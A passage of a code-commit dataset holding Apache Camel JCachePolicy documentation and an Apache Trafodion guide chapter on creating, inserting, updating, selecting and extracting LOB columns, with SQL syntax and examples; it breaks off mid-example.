JCachePolicy();\njcachePolicy.setCacheManager(cacheManager);\njcachePolicy.setCacheName(\"items\")\n----------------------------\n\n== Find cacheManager\n\nIf _cacheManager_ (and the _cache_) is not set, the policy will try to find a JCache CacheManager object:\n\n* Lookup a CacheManager in Camel registry - that falls back on JNDI or Spring context based on the environment\n* Use the standard api _Caching.getCachingProvider().getCacheManager()_\n\n[source,java]\n----------------------------\n\/\/A Cache \"getorders\" will be used (or created) from the found CacheManager\nfrom(\"direct:get-orders\").routeId(\"getorders\")\n .policy(new JCachePolicy())\n .log(\"Getting order with id: ${body}\")\n .bean(OrderService.class,\"findOrderById(${body})\");\n----------------------------\n\n== Partially wrapped route\n\nIn the examples above the whole route was executed or skipped. A policy can be used to wrap only a segment of the route instead of all processors.\n\n[source,java]\n----------------------------\nfrom(\"direct:get-orders\")\n .log(\"Order requested: ${body}\")\n .policy(new JCachePolicy())\n .log(\"Getting order with id: ${body}\")\n .bean(OrderService.class,\"findOrderById(${body})\")\n .end()\n .log(\"Order found: ${body}\");\n----------------------------\n\nThe _.log()_ at the beginning and at the end of the route is always called, but the section inside _.policy()_ and _.end()_ is executed based on the cache.\n\n== KeyExpression\n\nBy default the policy uses the received Exchange body as _key_, so the default expression is like _simple(\"$\\{body\\})_.\n We can set a different Camel Expression as _keyExpression_ which will be evaluated to determine the key.\n For example if we try to find an _order_ by an _orderId_ which is in the message headers,\n set _header(\"orderId\")_ (or _simple(\"${header.orderId})_ as _keyExpression_.\n\nThe expression is evaluated only once at the beginning of the route to determine the _key_. 
If nothing was found in cache,\n this _key_ is used to store the _value_ in cache at the end of the route.\n\n[source,java]\n----------------------------\nMutableConfiguration configuration = new MutableConfiguration<>();\nconfiguration.setTypes(String.class, Order.class);\nconfiguration.setExpiryPolicyFactory(CreatedExpiryPolicy.factoryOf(new Duration(TimeUnit.MINUTES, 10)));\n\nJCachePolicy jcachePolicy = new JCachePolicy();\njcachePolicy.setCacheConfiguration(configuration);\njcachePolicy.setCacheName(\"orders\")\njcachePolicy.setKeyExpression(simple(\"${header.orderId}))\n\n\/\/The cache key is taken from \"orderId\" header.\nfrom(\"direct:get-orders\")\n .policy(jcachePolicy)\n .log(\"Getting order with id: ${header.orderId}\")\n .bean(OrderService.class,\"findOrderById(${header.orderId})\");\n----------------------------\n\n== Camel XML DSL examples\n\n== Use JCachePolicy in an XML route\n\nIn Camel XML DSL we need a named reference to the JCachePolicy instance (registered in CamelContext or simply in Spring).\n We have to wrap the route between <policy>...<\/policy> tags after <from>.\n\n[source,xml]\n----------------------------\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route>\n <from uri=\"direct:get-order\"\/>\n <policy ref=\"jCachePolicy\" >\n <setBody>\n <method ref=\"orderService\" method=\"findOrderById(${body})\"\/>\n <\/setBody>\n <\/policy>\n <\/route>\n<\/camelContext>\n----------------------------\n\nSee this example when only a part of the route is wrapped:\n\n[source,xml]\n----------------------------\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route>\n <from uri=\"direct:get-order\"\/>\n <log message=\"Start - This is always called. body:${body}\"\/>\n <policy ref=\"jCachePolicy\" >\n <log message=\"Executing route, not found in cache. body:${body}\"\/>\n <setBody>\n <method ref=\"orderService\" method=\"findOrderById(${body})\"\/>\n <\/setBody>\n <\/policy>\n <log message=\"End - This is always called. 
body:${body}\"\/>\n <\/route>\n<\/camelContext>\n----------------------------\n\n\n== Define CachePolicy in Spring\n\nIt's more convenient to create a JCachePolicy in Java especially within a RouteBuilder using the Camel DSL expressions,\n but see this example to define it in a Spring XML:\n\n[source,xml]\n----------------------------\n<bean id=\"jCachePolicy\" class=\"org.apache.camel.component.jcache.policy.JCachePolicy\">\n <property name=\"cacheName\" value=\"spring\"\/>\n <property name=\"keyExpression\">\n <bean class=\"org.apache.camel.model.language.SimpleExpression\">\n <property name=\"expression\" value=\"${header.mykey}\"\/>\n <\/bean>\n <\/property>\n<\/bean>\n----------------------------\n\n== Create Cache from XML\n\nIt's not strictly speaking related to Camel XML DLS, but JCache providers usually have a way to configure the cache in an XML file.\n For example with Hazelcast you can add a _hazelcast.xml_ to classpath to configure the cache \"spring\" used in the example above.\n\n[source,xml]\n----------------------------\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<hazelcast xmlns=\"http:\/\/www.hazelcast.com\/schema\/config\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"http:\/\/www.hazelcast.com\/schema\/config hazelcast-config-3.11.xsd\" >\n\n <cache name=\"spring\">\n <key-type class-name=\"java.lang.String\"\/>\n <value-type class-name=\"java.lang.String\"\/>\n <expiry-policy-factory>\n <timed-expiry-policy-factory expiry-policy-type=\"CREATED\" duration-amount=\"60\" time-unit=\"MINUTES\"\/>\n <\/expiry-policy-factory>\n <\/cache>\n\n<\/hazelcast>\n----------------------------\n\n\n== Special scenarios and error handling\n\nIf the Cache used by the policy is closed (can be done dynamically), the whole caching functionality is skipped,\n the route will be executed every time.\n\nIf the determined _key_ is _null_, nothing is looked up or stored in cache.\n\nIn case of an exception during the route, the error handled is called as always. If the exception gets _handled()_,\n the policy stores the Exchange body, otherwise nothing is added to the cache.\n If an exception happens during evaluating the keyExpression, the routing fails, the error handler is called as normally.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f463ce29b16b9be39c5c5814ab9357a1f50b5b2f","subject":"Incorporate Comments 1","message":"Incorporate Comments 1\n","repos":"mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion","old_file":"docs\/lob_guide\/src\/asciidoc\/_chapters\/working_with_lob.adoc","new_file":"docs\/lob_guide\/src\/asciidoc\/_chapters\/working_with_lob.adoc","new_contents":"\/\/\/\/\r\n\/**\r\n* @@@ START COPYRIGHT @@@\r\n*\r\n* Licensed to the Apache Software Foundation (ASF) under one\r\n* or more contributor license agreements. See the NOTICE file\r\n* distributed with this work for additional information\r\n* regarding copyright ownership. The ASF licenses this file\r\n* to you under the Apache License, Version 2.0 (the\r\n* \"License\"); you may not use this file except in compliance\r\n* with the License. 
You may obtain a copy of the License at\r\n*\r\n* http:\/\/www.apache.org\/licenses\/LICENSE-2.0\r\n*\r\n* Unless required by applicable law or agreed to in writing,\r\n* software distributed under the License is distributed on an\r\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\r\n* KIND, either express or implied. See the License for the\r\n* specific language governing permissions and limitations\r\n* under the License.\r\n*\r\n* @@@ END COPYRIGHT @@@\r\n*\/\r\n\/\/\/\/\r\n\r\n[#working with lobs]\r\n= Working with LOBs\r\n\r\n[#creating a sql table with lob columns]\r\n== Creating a SQL Table with LOB Columns\r\n\r\nWhen creating a SQL table with LOB columns, the following relevant tables and files are created as well:\r\n\r\n* One LOB MD table.\r\n* Two dependent descriptor tables.\r\n* One HDFS data file (located at \/user\/trafodion\/lobs) for each column.\r\n\r\n[#syntax]\r\n=== Syntax\r\n\r\n```\r\nCREATE TABLE table-name (column-spec[, column-spec]\u2026)\r\n```\r\n\r\n```\r\ncolumn-spec is:\r\nlob-column-spec | \r\nother-column-spec\r\n\r\nlob-column-spec is:\r\ncolumn-name {lob-data-type}[column-constraint]\r\n\r\nother-column-spec is:\r\ncolumn-name {data-type}[column-constraint]\r\n\r\nlob-data-type is:\r\nBLOB | CLOB [({numeric literal} [unit])] [STORAGE 'storage literal']\r\n\r\nunit is:\r\nempty | \r\nK | \r\nM | \r\nG \r\n```\r\n\r\n[#semantics]\r\n=== Semantics\r\n\r\n* `_storage literal_`\r\n\r\n+\r\nCurrently Trafodion only supports `'EXTERNAL'` here. \r\n\r\n+\r\nAn external LOB object is not managed by Trafodion.\r\n\r\n* `_empty_`\r\n\r\n+\r\nNumber of bytes specified by the numeric literal.\r\n\r\n* `_K_`\r\n\r\n+\r\nNumeric literal value * 1024.\r\n\r\n* `_M_`\r\n\r\n+\r\nNumeric literal value * 1024 * 1024.\r\n\r\n* `_G_`\r\n\r\n+\r\nNumeric literal value * 1024 * 1024 * 1024.\r\n\r\n[#examples]\r\n=== Examples\r\n\r\n* This example creates a table tlob1 with 2 columns and the primary key on c1.\r\n\r\n+\r\n\r\n```\r\nCREATE TABLE tlob1 (c1 INT NOT NULL, c2 BLOB, PRIMARY KEY (c1));\r\n```\r\n\r\n* This example creates a table tlob2 with 3 columns and the primary key on c1.\r\n\r\n+\r\n\r\n```\r\nCREATE TABLE tlob2 (c1 INT NOT NULL, c2 BLOB, c3 CLOB, PRIMARY KEY (c1));\r\n```\r\n\r\n* This example creates a table tlob130txt_limit50 with 2 columns and the primary key on c1.\r\n\r\n+\r\n\r\n```\r\nCREATE TABLE tlob130txt_limit50 (c1 INT NOT NULL, c2 CLOB(50), PRIMARY KEY (c1));\r\n```\r\n\r\n* This example creates a table tlob130bin_limit1K with 2 columns and the primary key on c1.\r\n\r\n+\r\n\r\n```\r\nCREATE TABLE tlob130bin_limit1K (c1 INT NOT NULL, c2 BLOB(1 K), PRIMARY KEY (c1));\r\n```\r\n\r\n* This example creates a table tlob130ext with 4 columns and the primary key on c1.\r\n\r\n+\r\n\r\n```\r\nCREATE TABLE tlob130ext (c1 INT NOT NULL, c2 BLOB, c3 CLOB, c4 BLOB STORAGE 'EXTERNAL', PRIMARY KEY (c1));\r\n```\r\n\r\n[#hdfs location of lob data]\r\n=== HDFS Location of LOB Data\r\n\r\nWhen a LOB table is created, the underlying LOB data needs to be stored in HDFS. It is stored in \/user\/trafodion\/lobs by default. 
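\r\n\r\nFor instance, you can confirm where a table's LOB data lives with SHOWDDL (a minimal sketch using the tlob1 table created above; see <<showddl for lob,SHOWDDL for LOB>> for the full output):\r\n\r\n```\r\n-- the Data Storage section of the output lists the Location and DataFile\r\nSHOWDDL tlob1, LOB DETAILS;\r\n```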
\r\n\r\nAll columns of a table that are declared as LOB types will have all their data in one file per column, whose name is derived from the table's Object UID and the LOB number of that column, which gets assigned during creation.\r\n\r\nFor example, for a LOB table with 2 LOB columns, you will see 2 files in HDFS:\r\n\r\n\/user\/trafodion\/lobs\/LOBP_03683514167332904796_0001\r\n\r\n\/user\/trafodion\/lobs\/LOBP_03683514167332904796_0002\r\n\r\nAs rows are added to this table, the LOB data for each row gets appended to the corresponding column\u2019s LOB data file. \r\n\r\n[#inserting into a sql table containing lob columns]\r\n== Inserting into a SQL Table Containing LOB Columns\r\n\r\n[#syntax]\r\n=== Syntax\r\n\r\n```\r\nINSERT INTO table-name [(target-col-list)] insert-source\r\n```\r\n\r\n```\r\ntarget-col-list is: \r\ncolname[, colname]... \r\n\r\ninsert-source is: \r\nVALUES(column-expr[, column-expr]...)\r\n\r\ncolumn-expr is:\r\nlob-query-expr |\r\nother-query-expr\r\n\r\nlob-query-expr is: \r\nNULL | ? |\r\nEMPTY_BLOB() |\r\nEMPTY_CLOB() | \r\nSTRINGTOLOB('string literal expression') |\r\nFILETOLOB('lob source file name') |\r\nBUFFERTOLOB(LOCATION lob source buffer address, LENGTH lob length value) |\r\nEXTERNALTOLOB('external lob source file name') \r\n\r\nlob source file name is:\r\nhdfs:\/\/\/{local hdfs file name} | \r\n{local linux file name} |\r\n{file:\/\/\/linux file name} \r\n\r\nexternal lob source file name is: \r\nhdfs:\/\/\/{local hdfs file name}\r\n```\r\n\r\n[#semantics]\r\n=== Semantics\r\n\r\n* `_other-query-expr_`\r\n+\r\nFor the syntax and description of `_other-query-expr_`, see `_query-expr_` in the <<select_statement,SELECT Statement>>.\r\n\r\n* `_EMPTY_BLOB(), EMPTY_CLOB()_`\r\n+\r\nReturns an empty LOB handle. \r\n\r\n* `_STRINGTOLOB_`\r\n+\r\nConverts a simple string literal into LOB format. \r\n\r\n** `_string literal expression_`\r\n+\r\nis a series of characters enclosed in single quotes.\r\n\r\n* `_FILETOLOB_`\r\n+\r\nConverts data from a local linux\/hdfs file into LOB format.\r\n\r\n* `_BUFFERTOLOB_`\r\n+\r\nTakes an address and a size of an input buffer, and converts the data pointed to by that buffer into LOB format. \r\n\r\n** `_lob source buffer address_`\r\n+\r\nThe long value of the user buffer address in int64.\r\n\r\n** `_lob length value_`\r\n+\r\nThe length of the user specified lob buffer in int64.\r\n\r\n[#considerations]\r\n=== Considerations\r\n\r\nThe source for inserting into a LOB can be any of the following:\r\n\r\n* A parameter.\r\n+\r\nAn unnamed parameter can be used to prepare a statement; then, during execution, either a function or a simple string parameter can be passed in, which will be converted to LOB data.\r\n\r\n* `EMPTY_BLOB()` or `EMPTY_CLOB()` \r\n\r\n** If `EMPTY_BLOB()` or `EMPTY_CLOB()` is specified, then a dummy lob handle is created. \r\n\r\n*** No data is associated with the empty LOBs yet, but these dummy LOB handles can later be used to populate with new LOB data. If the LOB had data previously associated with it, it will be erased.\r\n\r\n*** The dummy LOB handle will get the same datatype as the underlying column.\r\n+\r\nFor example, if the LOB column was defined as `'EXTERNAL'` during table creation, then the LOB column gets that type. If it\u2019s not defined, then it is considered a regular LOB. \r\n\r\n** An empty LOB is distinct from a LOB containing a string of length zero or a null LOB.\r\n\r\n* An in-memory LOB, which is simple string data. 
\r\n+\r\nTo insert a string literal, you need to provide `STRINGTOLOB('string literal expression')`.\r\n\r\n* An on-platform file (linux\/hdfs file) containing binary or text data.\r\n+\r\nTo insert an on-platform file, you need to provide `FILETOLOB('lob source file name')`. \r\n\r\n* A user buffer of a specified length allocated in user space.\r\n+\r\nTo insert a buffer, you need to provide the address and size of the buffer.\r\n\r\n* An external LOB.\r\n+ \r\nWhen an external LOB is specified via `EXTERNALTOLOB('external lob source file name')`, the data associated with the external HDFS file is not transferred into the Trafodion LOB. Instead, Trafodion stores the file path\/handle of the external file. \r\n+\r\nFor example, if you have a directory of pictures, you can specify the full hdfs path to each picture file to this function and the path will get stored in the Trafodion table. Later during retrieval, the file name will be used to go to the actual file to retrieve the data. \r\n\r\n[#examples]\r\n=== Examples\r\n\r\n* This example uses the `STRINGTOLOB` function that converts a simple string literal into LOB format before inserting.\r\n+\r\n```\r\nINSERT INTO tlob1 VALUES(1,stringtolob('inserted row'));\r\n```\r\n\r\n* This example uses the `FILETOLOB` function that converts data from a local file into LOB format, and stores all data into HDFS associated with that value.\r\n+\r\n```\r\nINSERT INTO tlob130txt1 VALUES(1,filetolob('lob_input_a1.txt'));\r\n```\r\n\r\n* This example uses the `BUFFERTOLOB` function, which takes an int64 value as an input: an address of a buffer, plus a size parameter. The buffer contents are converted to LOB format and stored in HDFS.\r\n+\r\n```\r\nINSERT INTO tlob1 VALUES (1, buffertolob(LOCATION 124647474, SIZE 2048));\r\n```\r\n\r\n* This example uses different functions to convert strings, files, and external lobs into LOB data. The `EXTERNALTOLOB` function takes an external file. \r\n+\r\n```\r\nINSERT INTO tlob130ext VALUES(1, STRINGTOLOB('first lob'), \r\nFILETOLOB('hdfs:\/\/\/lobs\/lob_input_a1.txt'), \r\nEXTERNALTOLOB('hdfs:\/\/\/lobs\/lob_input_a1.txt'));\r\n```\r\n\r\n* This example uses a parameter.\r\n+\r\n```\r\nPREPARE S FROM INSERT INTO t130lob2 VALUES (1, ?);\r\nEXECUTE S USING 'fgfgfhfhfhfhhfhfhfhjfkkfkffllflflfll';\r\n```\r\n\r\n* This example uses the `EMPTY_BLOB` function to insert an empty lob, creating a dummy lob handle. \r\n+\r\n```\r\nINSERT INTO t130lob2 VALUES (1, empty_blob());\r\n```\r\n\r\n[#inserting into a sql table containing lob columns using select clause]\r\n== Inserting into a SQL Table Containing LOB Columns Using Select Clause\r\n\r\n[#syntax]\r\n=== Syntax\r\n\r\n```\r\nINSERT INTO target-table [(target-col-list-expr)] SELECT [source-col-list-expr] FROM source-table\r\n```\r\n\r\n```\r\ntarget-col-list-expr is: \r\ntarget-colname[, target-colname]...\r\n\r\ntarget-colname is: \r\nlob-column-name |\r\nother-column-name\r\n\r\nsource-col-list-expr is: \r\nsource-colname[, source-colname]...\r\n\r\nsource-colname is: \r\nhive varchar column name | \r\ntrafodion varchar column name | \r\ntrafodion char column name |\r\ntrafodion lob column name\r\n\r\nsource-table is: \r\nhive table |\r\ntrafodion table \r\n```\r\n\r\n[#semantics]\r\n=== Semantics\r\n\r\n* `_target-col-list-expr_`\r\n+\r\nnames a single column or multiple columns enclosed in parentheses in the target table in which to insert values. \r\n\r\n+\r\nThe data type of each target column must be compatible with the data type of its corresponding source value. 
\r\n\r\n+\r\nWithin the list, each target column must have the same position as its associated source value.\r\n\r\n** `_target-colname_` \r\n+\r\nis a SQL identifier that specifies a target column name.\r\n\r\n* `_source-col-list-expr_`\r\n+\r\nnames a single column or multiple columns enclosed in parentheses in the source table from which to get values. \r\n\r\n** `_source-colname_` \r\n+\r\nis a SQL identifier that specifies a source column name.\r\n\r\n[#considerations]\r\n=== Considerations\r\n\r\nWhen inserting from a source Trafodion table column into a target table, the source column subtype of the LOB column needs to match the target table column. That is, you cannot insert from an external LOB column into a regular LOB column in the target. They both need to be the same type. \r\n\r\nThe source for the *select clause* can be any of the following: \r\n\r\n* A source hive table column that is a hive varchar column\r\n* A source table column that is a Trafodion varchar, char, or LOB column\r\n* A source table column that is also a LOB datatype\r\n\r\n[#examples]\r\n=== Examples\r\n\r\n* This example inserts the first 10 rows of d_date_sk and d_date_id selected from the source hive table hive.hive.date_dim into the target table t130lob2.\r\n+\r\n```\r\nINSERT INTO t130lob2 SELECT [first 10] d_date_sk,d_date_id FROM hive.hive.date_dim;\r\n```\r\n\r\n* This example inserts the c1 and c2 selected from the source Trafodion table t130var into the c1 and c2 of the target table t130lob2.\r\n+\r\n```\r\nINSERT INTO t130lob2(c1,c2) SELECT c1,c2 FROM t130var;\r\n```\r\n\r\n* This example inserts the c1 and c2 selected from the source Trafodion table t130char into the c1 and c2 of the target table t130lob2.\r\n+\r\n```\r\nINSERT INTO t130lob2(c1,c2) SELECT c1,c2 FROM t130char;\r\n```\r\n\r\n* This example inserts the c1, c2 and c3 selected from the source Trafodion table t130lob2 into the target table t130lob3, and then shows the result.\r\n+\r\n```\r\nINSERT INTO t130lob3 SELECT c1,c2,c3 FROM t130lob2;\r\nSELECT c1,lobtostring(c2,100),lobtostring(c3,100) FROM t130lob3;\r\n```\r\n\r\n[#updating a sql table containing lob columns]\r\n== Updating a SQL Table Containing LOB Columns\r\n\r\nThe source for updating a LOB can be divided into 2 groups:\r\n\r\n* Update using parameters\/functions\r\n* Update using LOB handle\r\n\r\n[#updating using parameters\/functions]\r\n=== Updating Using Parameters\/Functions\r\n\r\nThe following parameters\/functions can be used to update:\r\n\r\n* A parameter\r\n* `EMPTY_BLOB` or `EMPTY_CLOB`\r\n* An in-memory lob, which is simple string data \r\n+\r\nTo insert this string, a literal needs to be provided.\r\n* An on-platform file (linux\/hdfs file) containing text or binary data \r\n* A user buffer of a specified length allocated in user space\r\n* An external LOB file in HDFS\r\n\r\n[#syntax]\r\n==== Syntax \r\n\r\n```\r\nUPDATE table-name {set-clause-type1 | set-clause-type2} \r\n```\r\n\r\n```\r\nset-clause-type1 is: \r\nSET set-clause[, set-clause ].. \r\n\r\nset-clause is: \r\nlob_column-name = {lob_query-expr} \r\n\r\nlob_query-expr is:\r\nNULL | ? 
|\r\nEMPTY_BLOB() |\r\nEMPTY_CLOB() | \r\nSTRINGTOLOB('string literal expression'[, APPEND]) |\r\nFILETOLOB('lob source file name'[, APPEND]) |\r\nBUFFERTOLOB(LOCATION lob source buffer address, LENGTH lob length value[, APPEND]) |\r\nEXTERNALTOLOB('external lob source file name'[, APPEND])\r\n\r\nlob source file name is:\r\nhdfs:\/\/\/{local hdfs file name} | \r\n{local linux file name} |\r\n{file:\/\/\/linux file name} \r\n\r\nexternal lob source file name is: \r\nhdfs:\/\/\/{local hdfs file name}\r\n```\r\n\r\n[#semantics]\r\n==== Semantics\r\n\r\nFor more information, see Semantics in <<inserting into a sql table containing lob columns,Inserting into a SQL Table Containing LOB Columns>>.\r\n\r\n[#examples]\r\n==== Examples\r\n\r\n* In the table tlob1 where c1 is 3, updates (appends) the value of c2 to lob_update.txt.\r\n+\r\n```\r\nUPDATE tlob1 SET c2=filetolob('lob_update.txt', append) WHERE c1 = 3;\r\n```\r\n\r\n* In the table tlob1, updates (overwrites) the value of c2 to anoush.jpg.\r\n+\r\n```\r\nUPDATE tlob1 SET c2=filetolob('anoush.jpg');\r\n```\r\n\r\n* In the table tlob1 where c1 is 3, updates (appends) the value of c2 to lob_update.txt stored in hdfs:\/\/\/lobs\/.\r\n+\r\n```\r\nUPDATE tlob1 SET c2=filetolob('hdfs:\/\/\/lobs\/lob_update.txt', append) WHERE c1 = 3;\r\n```\r\n\r\n* In the table tlob1, updates (overwrites) the value of c2 to the buffer location at 1254674 with 4000-byte length.\r\n+\r\n```\r\nUPDATE tlob1 SET c2=buffertolob(LOCATION 12546474, SIZE 4000);\r\n```\r\n\r\n* In the table tlob130ext where c1 is 2, updates (overwrites) the value of c4 to lob_input_d1.txt stored in hdfs:\/\/\/lobs\/.\r\n+\r\n```\r\nUPDATE tlob130ext SET c4=externaltolob('hdfs:\/\/\/lobs\/lob_input_d1.txt') WHERE c1=2;\r\n```\r\n\r\n* In the table t130lob2 where c1 is 1, updates (overwrites) the value of c2 to xyxyxyxyxyxyx.\r\n+\r\n```\r\nPREPARE S FROM UPDATE t130lob2 SET c2=? WHERE c1 =1;\r\nEXECUTE S USING 'xyxyxyxyxyxyx';\r\n```\r\n\r\n[#updating using lob handle]\r\n=== Updating Using Lob Handle\r\n\r\nA LOB handle is specified to the update (similar to extract). \r\n\r\n[#syntax]\r\n==== Syntax \r\n\r\n```\r\nUPDATE LOB (LOB 'lob handle', lob update expression)\r\n```\r\n\r\n```\r\nlob update expression is: \r\nLOCATION lob source buffer address, LENGTH lob length value [, APPEND] | \r\nEMPTY_BLOB() | \r\nEMPTY_CLOB()\r\n```\r\n\r\nFor more information about examples, see the http:\/\/trafodion.incubator.apache.org\/docs\/jdbct4ref_guide\/index.html[*Trafodion JDBC Type 4 Programmer\u2019s Reference Guide*].\r\n\r\n[#considerations]\r\n=== Considerations\r\n\r\n* The keyword `APPEND` can be used to append to lob data that may already exist in a LOB column. If it is not specified, the data is overwritten.\r\n\r\n* When a LOB column is updated or overwritten, a new section is written into the LOB data file. The old section remains in HDFS but won\u2019t have any pointer or reference to it.\r\n\r\n* When a LOB column is appended, a new chunk is inserted into HDFS and a new row is added in the LOB Descriptor Chunks table to keep track of this new chunk, belonging to the existing row\/LOB data. 
\r\n\r\n+\r\nSo a LOB column that contains data that has been appended several times can contain multiple descriptor rows in the Descriptor Chunks table to describe where each chunk belonging to this LOB begins\/ends.\r\n\r\n* `APPEND` cannot be used on function `EXTERNALTOLOB`.\r\n\r\n* When an external LOB is updated outside of Trafodion, an update needs to be done to update the descriptor files in Trafodion. \r\n+\r\nFor example, if the external file changes in size, the descriptor file needs to be updated to reflect that. Since this is outside the control of Trafodion, the user needs to do this. If not, when extracting data, only partial data may be returned. \r\n\r\n* If a column is declared with the `STORAGE 'External'` attribute, the `STRINGTOLOB` or `FILETOLOB` functions cannot be used to insert data into that column. \r\n+\r\nSimilarly, if a column is declared without the `STORAGE 'External'` attribute, the `EXTERNALTOLOB` function cannot be used to insert\/update data into that column.\r\n+\r\nThat is, once the storage for a LOB column is declared at CREATE time, the attribute is set and cannot be modified. \r\n\r\n[#selecting column from a sql table containing lob columns]\r\n== Selecting Column from a SQL Table Containing LOB Columns\r\n\r\nSelecting a row from a table will give back the lob handle for the lob column. \r\n\r\nNOTE: The entry in each lob column in the SQL table only contains the LOB handle.\r\n\r\nOnce the LOB handle has been retrieved, it can be used to retrieve the actual lob data from HDFS.\r\n\r\n[#syntax]\r\n=== Syntax\r\n\r\n```\r\nSELECT lob_query-expr[, lob_query-expr] FROM table-name\r\n```\r\n\r\n```\r\nlob_query_expr is: \r\nlobtostring(lob column) |\r\nlob column\r\n```\r\n\r\n[#examples]\r\n=== Examples\r\n\r\n* This example selects c2 from table tlob1 and returns the lob handle of c2.\r\n+\r\n```\r\nSELECT c2 FROM tlob1;\r\nC2\r\n----------------------------------------------------------------------------------------------------\r\n\r\nLOBH00000200010423909193650389683319694857010382259683718212310961182290216021\"TRAFODION\".\"SEABASE\" \r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n[#extracting lob data from a sql table containing lob columns]\r\n== Extracting LOB Data from a SQL Table Containing LOB Columns \r\n\r\nExtracting lob data can be done in two ways (see the sketch after this list):\r\n\r\n* Extract lob data into a file for a given lob handle\r\n+\r\nExtract from a LOB column straight into an on-platform linux or HDFS file in one shot. \r\n\r\n+\r\nThe Trafodion engine will take care of buffering the data and retrieving the lob data into the target file.\r\n\r\n* Extract lob data into a user specified buffer\r\n+\r\nExtract from a LOB column into a target user buffer of a specified size. \r\n+\r\nThe Trafodion engine will retrieve exactly the amount of requested data. \r\n+\r\nThe user\/application will be responsible for redriving the extract until end of data. \r\n+\r\nThe extracted buffer data can then be written to files or another location as the application chooses. 
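\r\n\r\nAs a sketch of the first approach, the flow below retrieves the LOB handle with a SELECT and then passes that handle to EXTRACT LOBTOFILE (the handle string and target file name here are placeholders; use the actual handle returned by the SELECT):\r\n\r\n```\r\n-- returns the LOB handle for column c2\r\nSELECT c2 FROM tlob1 WHERE c1 = 1;\r\n\r\n-- pass the returned handle as a quoted string\r\nEXTRACT LOBTOFILE (LOB '<lob handle returned above>', 'tlob1_c2.txt', CREATE, TRUNCATE);\r\n```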
\r\n\r\n[#extracting lob data into a file for a given lob handle]\r\n=== Extracting Lob Data into a File for a Given Lob Handle \r\n\r\n[#syntax]\r\n==== Syntax\r\n\r\n```\r\nEXTRACT LOBTOFILE (LOB 'lob handle as quoted string', 'filename URI format' [OPTION]) \r\n```\r\n\r\n```\r\nOPTION is: \r\n[, TRUNCATE]\r\n[, CREATE, TRUNCATE]\r\n[, APPEND] \r\n[, CREATE, APPEND]\r\n```\r\n\r\n[#semantics]\r\n==== Semantics\r\n\r\n* `TRUNCATE`\r\n+\r\nIf the target file exists, Trafodion will truncate and write to it.\r\n+\r\nIf the target file does not exist, an error will be raised.\r\n\r\n* `CREATE, TRUNCATE`\r\n+\r\nIf the target file exists, Trafodion will truncate and write to it. \r\n+\r\nIf the target file does not exist, Trafodion will create a file and write to it.\r\n\r\n* `APPEND`\r\n+\r\nIf the target file exists, Trafodion will append to it. \r\n+\r\nIf the target file does not exist, an error will be raised.\r\n\r\n* `CREATE, APPEND`\r\n+\r\nIf the target file exists, Trafodion will append to it. \r\n+\r\nIf the target file does not exist, Trafodion will create a file and append to it. \r\n\r\n[#considerations]\r\n==== Considerations\r\n\r\nIf the target file exists and no `OPTION` is specified, an error will be raised; this is the default behavior.\r\n\r\nIf the target file does not exist, you can create a target file by specifying the `OPTION`. \r\n\r\n[#examples]\r\n==== Examples\r\n\r\n* This example extracts LOB data to tlob130_txt1.txt:\r\n\r\n+\r\n```\r\nEXTRACT LOBTOFILE (LOB 'LOBH00000200010520117997292583625519884121437206093184618212317486018305654020\"TRAFODION\".\"LOB130\"', 'tlob130_txt1.txt');\r\nSuccess. Targetfile:tlob130_txt1.txt Length: 19\r\n```\r\n\r\n* This example extracts LOB data to tlob130_deep.jpg:\r\n+\r\n```\r\nEXTRACT LOBTOFILE (LOB 'LOBH00000200010520117997292583681719884121437210516812518212317486062586654020\"TRAFODION\".\"LOB130\"', 'tlob130_deep.jpg');\r\nSuccess. Targetfile:tlob130_deep.jpg Length: 159018\r\n```\r\n\r\n[#extracting lob data into a user specified buffer]\r\n=== Extracting Lob Data into a User Specified Buffer\r\n\r\nExtract from a LOB column into a target user buffer of a specified size. The Trafodion engine will retrieve exactly the amount of requested data. The user\/application will be responsible for redriving the extract until end of data. Then the extracted buffer data can be written to files or another location as the application chooses. \r\n\r\nExtract LOB data into a user specified buffer like a cursor until EOD is returned. For this method, the user specifies an input buffer and specifies the input length in an in\/out variable. \r\n\r\nFor each execution of the extract, Trafodion will return SUCCESS, ERROR or EOD. \r\nFor the cases of SUCCESS or EOD, a length will also be returned to the user, so the user knows exactly how much data was actually extracted and returned. \r\n\r\n[#syntax]\r\n==== Syntax\r\n\r\n```\r\nEXTRACT LOBTOBUFFER (LOB 'lob handle as quoted string', LOCATION lob output buffer address as long, SIZE input\/output address of length container as long)\r\n```\r\n\r\n[#extracting lob length for a given lob handle]\r\n=== Extracting Lob Length for a Given Lob Handle\r\n\r\nExtracts the length of the LOB data for a given lob handle. 
\r\n\r\n[#syntax]\r\n==== Syntax\r\n\r\n```\r\nEXTRACT LOBLENGTH (LOB 'lob handle as quoted string'[, LOCATION address of length container for lob length])\r\n```\r\n\r\n[#semantics]\r\n==== Semantics\r\n\r\n* `_LOCATION address of length container for lob length_`\r\n\r\n+\r\nThis is used by programs\/applications that will use this syntax to retrieve the LOB length prior to extracting data. The address should be an address of a 64-bit container that will hold the LOB length. \r\n+\r\nIf the LOCATION is omitted or 0, only a status message that displays the length is returned.\r\n\r\n[#examples]\r\n==== Examples\r\n\r\n* This example extracts the LOB length and returns 30.\r\n\r\n+\r\n```\r\nEXTRACT LOBLENGTH (LOB 'LOBH0000000800030554121478481170502119554121478546064413218212330526373762019024\"TRAFODION\".\"TESTEXTLOB\"');\r\nLOB Length: 30\r\n--- SQL operation complete.\r\n```\r\n\r\n* This example extracts the LOB length and returns 4.\r\n\r\n+\r\n```\r\nEXTRACT LOBLENGTH (LOB 